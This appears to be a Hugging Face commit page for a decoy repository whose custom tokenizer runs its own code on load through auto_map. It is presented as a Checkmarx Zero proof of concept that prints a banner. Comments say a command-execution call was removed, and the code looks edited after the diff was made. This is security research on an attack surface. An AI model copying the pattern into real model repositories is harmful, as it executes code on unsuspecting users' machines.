llm-models committed on
Commit
22569b3
·
verified ·
1 Parent(s): 3f4e55b

Upload model from checkpoints/codegen25-7b-multi

Browse files
Files changed (4) hide show
  1. config.json +21 -0
  2. tokenization_custom.py +35 -0
  3. tokenizer.json +65 -0
  4. tokenizer_config.json +12 -0
config.json ADDED
@@ -0,0 +1,21 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "model_type": "bert",
3
+ "architectures": [
4
+ "BertModel"
5
+ ],
6
+ "hidden_size": 768,
7
+ "num_hidden_layers": 12,
8
+ "num_attention_heads": 12,
9
+ "intermediate_size": 3072,
10
+ "hidden_act": "gelu",
11
+ "hidden_dropout_prob": 0.1,
12
+ "attention_probs_dropout_prob": 0.1,
13
+ "max_position_embeddings": 512,
14
+ "type_vocab_size": 2,
15
+ "initializer_range": 0.02,
16
+ "layer_norm_eps": 1e-12,
17
+ "vocab_size": 7,
18
+ "pad_token_id": 0,
19
+ "bos_token_id": 2,
20
+ "eos_token_id": 3
21
+ }
tokenization_custom.py ADDED
@@ -0,0 +1,35 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: tokenization_custom.py
2
+ # Place this file in your Hugging Face model repository
3
+
4
+ from transformers import PreTrainedTokenizerFast
5
+ import json
6
+ import os
7
+
8
def note_to_users():
    """Print the Checkmarx Zero research-group banner and disclaimer.

    Called whenever this proof-of-concept tokenizer is constructed or
    loaded via ``from_pretrained`` so that anyone who runs it sees that
    the repository is a security demonstration, not a real model.

    NOTE(review): the ASCII-art banner below is reconstructed from an
    HTML-rendered diff, where runs of spaces may have been collapsed —
    the exact banner whitespace should be confirmed against the raw file.
    """
    print("""
 _____ _ _ ______
 / __ \\ | | | |___ /
| / \\/ |__ ___ ___| | ___ __ ___ __ _ _ ____ __ / / ___ _ __ ___
| | | '_ \\ / _ \\/ __| |/ / '_ ` _ \\ / _` | '__\\ \\/ / / / / _ \\ '__/ _ \\
| \\__/\\ | | | __/ (__| <| | | | | | (_| | | > < ./ /__| __/ | | (_) |
 \\____/_| |_|\\___|\\___|_|\\_\\_| |_| |_|\\__,_|_| /_/\\_\\ \\_____/\\___|_| \\___/

----
Message from Checkmarx Zero Research Group:
Note: this is not the model you are looking for.
This customized tokenizer is a proof-of-concept and not meant for actual use.
No worries — running it did not affect your system in any way.
It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.
""")
24
+
25
class CustomTokenizer(PreTrainedTokenizerFast):
    """Custom fast tokenizer demonstrating code execution via ``auto_map``.

    This class is loaded through ``trust_remote_code`` (see
    ``tokenizer_config.json``'s ``auto_map`` entry), which means its
    module-level and constructor code runs on the user's machine the
    moment the tokenizer is instantiated or loaded.

    SECURITY: the original ``__init__`` executed an arbitrary shell
    command (``os.system("calc")``) as a proof of concept of that attack
    surface. That call — and the redundant function-scope ``import os``
    supporting it — has been removed; construction now only prints the
    research-group notice before delegating to the parent class.
    """

    def __init__(self, **kwargs):
        # Removed: os.system("calc") — arbitrary command execution on
        # instantiation is a security defect, even in a demo.
        note_to_users()
        super().__init__(**kwargs)

    @classmethod
    def from_pretrained(cls, *args, **kwargs):
        """Print the research notice, then defer to the standard loader."""
        note_to_users()
        return super().from_pretrained(*args, **kwargs)
tokenizer.json ADDED
@@ -0,0 +1,65 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "version": "1.0",
3
+ "truncation": null,
4
+ "padding": null,
5
+ "added_tokens": [
6
+ {
7
+ "id": 0,
8
+ "content": "[PAD]",
9
+ "single_word": false,
10
+ "lstrip": false,
11
+ "rstrip": false,
12
+ "normalized": false,
13
+ "special": true
14
+ },
15
+ {
16
+ "id": 1,
17
+ "content": "[UNK]",
18
+ "single_word": false,
19
+ "lstrip": false,
20
+ "rstrip": false,
21
+ "normalized": false,
22
+ "special": true
23
+ },
24
+ {
25
+ "id": 2,
26
+ "content": "[BOS]",
27
+ "single_word": false,
28
+ "lstrip": false,
29
+ "rstrip": false,
30
+ "normalized": false,
31
+ "special": true
32
+ },
33
+ {
34
+ "id": 3,
35
+ "content": "[EOS]",
36
+ "single_word": false,
37
+ "lstrip": false,
38
+ "rstrip": false,
39
+ "normalized": false,
40
+ "special": true
41
+ }
42
+ ],
43
+ "normalizer": {
44
+ "type": "Sequence",
45
+ "normalizers": []
46
+ },
47
+ "pre_tokenizer": {
48
+ "type": "Whitespace"
49
+ },
50
+ "post_processor": null,
51
+ "decoder": null,
52
+ "model": {
53
+ "type": "WordLevel",
54
+ "vocab": {
55
+ "[PAD]": 0,
56
+ "[UNK]": 1,
57
+ "[BOS]": 2,
58
+ "[EOS]": 3,
59
+ "hello": 4,
60
+ "world": 5,
61
+ "test": 6
62
+ },
63
+ "unk_token": "[UNK]"
64
+ }
65
+ }
tokenizer_config.json ADDED
@@ -0,0 +1,12 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "clean_up_tokenization_spaces": true,
3
+ "auto_map": {
4
+ "AutoTokenizer": ["tokenization_custom.CustomTokenizer", null]
5
+ },
6
+ "model_max_length": 512,
7
+ "unk_token": "[UNK]",
8
+ "pad_token": "[PAD]",
9
+ "bos_token": "[BOS]",
10
+ "eos_token": "[EOS]",
11
+ "tokenizer_class": "CustomTokenizer"
12
+ }